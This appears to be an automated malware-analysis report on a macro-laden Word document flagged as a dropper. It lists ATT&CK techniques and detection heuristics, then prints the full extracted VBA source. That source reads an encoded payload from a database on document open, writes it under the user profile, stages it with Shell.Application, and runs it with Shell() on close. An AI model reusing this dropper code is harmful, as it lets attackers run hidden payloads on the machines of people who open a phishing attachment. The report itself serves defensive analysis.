Verdict: MALICIOUS (risk score 270)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open subroutine, a common technique for executing malicious code as soon as the document is opened. A companion Document_Close subroutine calls `Shell()` on a file path built from the `USERPROFILE` environment variable and text embedded in the document's user forms, which indicates downloader or dropper functionality. The `CreateObject("Shell.Application")` call is used with `Namespace(...).CopyHere` to copy (or extract) items from one path under the user profile to another, staging the payload that the `Shell()` call later executes.
Heuristics (8)
- ClamAV: Doc.Dropper.Agent-7181777-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-7181777-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL)
- Document_Open macro (high, OLE_VBA_DOCOPEN)
- CreateObject call (high, OLE_VBA_CREATEOBJ)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3079 bytes |

SHA-256 of macros.bas: de70345a34c416da48c59477e1790aebce37c9f56e39c564354481b11457f733
Script preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "NewWordDoc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim Path As Variant
Path = Environ$("USERPROFILE") & Setteins_Frm.Unpath_txt.Text
Dim fILEzz As String
fILEzz = Path & Setteins_Frm.Name_txt.Text
Dim RetVal
RetVal = Shell(fILEzz, 1)
End Sub
Private Sub Document_Open()
TextLoder_Frm.Bits_txt.Text = Conjuction("Select * from Data where Id_No = 4", 1)
Setteins_Frm.Spliterzz
TextLoder_Frm.COnverttbitzz
End Sub
Public Function Conjuction(Command As String, Ind As Integer) As String
Dim Coonaction As ADODB.Connection
Dim ResssData As ADODB.Recordset
Dim StrConn As String
StrConn = Setteins_Frm.Con_txt.Text
Set Coonaction = New ADODB.Connection
Coonaction.Open StrConn
Set ResssData = Coonaction.Execute(Command)
Conjuction = ResssData.Fields(Ind).Value
End Function
Attribute VB_Name = "BitzzHolder"
Public Function UnBitzzz()
Dim Unzz As Variant
Dim Pathzz As Variant
Dim ShellAppzz As Object
Unzz = Environ$("USERPROFILE") & Setteins_Frm.Unpath_txt.Text
Pathzz = Environ$("USERPROFILE") & NewWordDoc.Conjuction("Select * from Name", 1)
Set ShellAppzz = CreateObject("Shell.Application")
ShellAppzz.Namespace(Unzz).CopyHere ShellAppzz.Namespace(Pathzz).Items
End Function
Attribute VB_Name = "Holder"
Public DataStr() As String
Public BitzArry() As Byte
Attribute VB_Name = "Setteins_Frm"
Attribute VB_Base = "0{10B87DAF-FE64-40B2-A605-5337D99EB52B}{0247BF34-AE0F-4B0E-A988-F641D1A6F9C5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function Spliterzz()
Dim Array_bt() As String
Dim Bt As String
Bt = TextLoder_Frm.Bits_txt.Text
Array_bt = Split(Bt, "!")
Holder.DataStr = Array_bt
End Function
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "TextLoder_Frm"
Attribute VB_Base = "0{D79C8270-1FFD-4898-9584-C3D70A4FA634}{FC555986-2D45-499E-9922-0EEE7D545EFA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function COnverttbitzz()
Dim Idz As Double
Idz = 0
Dim F_Bytzz() As Byte
For Each dit In Holder.DataStr
ReDim Preserve F_Bytzz(Idz)
F_Bytzz(Idz) = CByte(dit)
Idz = Idz + 1
Next
Holder.BitzArry = F_Bytzz
Dim patds As String
patds = Environ$("USERPROFILE") & Setteins_Frm.Path_txt
Open patds For Binary Access Write As #1
Put #1, , Holder.BitzArry
Close 1
BitzzHolder.UnBitzzz
End Function
Private Sub Bits_txt_Change()
End Sub
Private Sub UserForm_Click()
End Sub
```